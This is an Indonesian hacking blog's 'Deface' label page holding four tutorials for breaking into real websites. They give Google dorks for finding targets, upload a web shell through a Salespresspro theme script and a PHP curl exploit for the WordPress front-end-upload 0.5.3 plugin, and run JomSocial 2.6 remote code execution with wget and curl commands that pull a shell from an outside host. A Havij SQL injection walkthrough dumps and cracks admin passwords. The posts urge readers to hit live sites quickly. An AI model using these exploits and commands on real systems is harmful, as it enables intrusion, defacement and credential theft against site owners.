Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

22/11/14

0 Cara Deface Dengan Exploit WP Themes Salespresspro

Kali ini saya akan membagikan tutorial "Cara Deface Dengan Exploit WP Themes Salespresspro" yang baru saja saya baca di blognya Java-Cyber. Barusan saya terapin masih dapat banyak kok jadi buruan dah hajar sebelum kehabisan hahaha :D
  • Dork : inurl:wp-content/salespresspro
  • Exploit : /wp-content/themes/salespresspro/headerimgbgblog-upload.php
1. Silahkan cari target dulu ke google, lalu buka salah satu website dan ubah urlnya jadi seperti ini :

 www.bimo-notes.org/wp-content/themes/salespresspro/headerimgbgblog-upload.php

2. Silahkan upload langsung shell kalian ( Browse -> shell.php -> upload file )


 3. Setelah itu, nanti dibagian "Your Uploaded Images" muncul gambar rusak, silahan open new tab / copy link gambar rusak tersebut lalu buka.



Nah setelah berhasil upload shell, sekarng terserah mau diapain.
Kalau mau ditebas Indexnya silahkan back up dolo ya bro :) Untuk simple patchnya silahkan rename fileheaderimgbgblog-upload.php menjadi headerimgbgblog-upload.txt.

03/04/14

0 JomSocial 2.6 - Remote Code Execution



Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

Bahan sebelum beraksi download bahannya :
☁ Exploit
☁ Python 27

Step - step :
♤ Install Python
♤ Open cmd
♤ Masuk dir dimana exploit berada
♤ Jalankan exploit

Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi :
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

♤ Cara tanam shell :

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"
Pada komponen Jomsocial versi 2.6 terdapat bug Rce (Remote Code Execution) yang memungkinkan attacker mengeksekusi kode² berbahaya untuk mengeksploitasi web yg memakai komponen ini.

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

18/03/14

0 Deface Website Dengan Menggunakan Havij


Defacing adalah merupakan bagian dari kegiatan hacking web atau program application, yang menfokuskan target operasi pada perubahan tampilan dan/atau konfigurasi fisik dari web atau program aplikasi tanpa melalui source code program tersebut. Sedangkan deface itu sendiri adalah hasil akhir dari kegiatan cracking dan sejenisnya – tekniknya adalah dengan mbaca source codenya (ini khusus untuk konteks web hacking), trus ngganti image (misalnya), editing html tag dkk, dan lain-lain.


Download Tools :
Installation Setup :
  • Download Tools Havijnya.
  • Lalu Install Filenya.
  • Kemudian Double Klik Icon Havijnya.
  • Selesai.
1). Kalau Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.


2). Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google, Banyak kok d(^_^)b

3). Jika target sudah dapat, saya ambil contoh http://www.tested.go.id/index.php?q=hotspot&hid=2054

4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.


6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.


7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.


8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.


9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.

Nah bagaimana sob? lebih mudah atau lebih sulit dengan cara yang pernah saya post sebelumnya, kalo menurut saya cara ini adalah cara terpraktis, termurah dan paling gampang kalo kita mau meretas sebuah website.

Sekian saja postingan saya kali ini tentang Cara Hacking Website Dengan Menggunakan Tools Havij 1.15, semoga anda tidak bosan  mengunjungi blog saya ini.

04/01/14

0 Wordpress front end upload 0.5.3 Arbitrary File Upload

Bahan-Bahan :
  • XAMPP (Serch Di Google Banyak Kok)
  • Shell (Bisa Pakek Shell anda Sendiri)

Langkah-Langkah :

1.Search Di Google Gunakan Dork

inurl:wp-content/plugins/front-end-upload/

3).Jika Ketemu Masukan Exploit /wp-content/plugins/front-end-upload/upload.php

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D



<?php
$u="namashell.php";
$c = curl_init("http://site.com/wp-content/plugins/front-end-upload/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>


4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D

10).Untuk Letak Shellnya Ada Di
http://site.com/
wp-content/uploads/iti_feu_uploads/shell.php
Blogger Tricks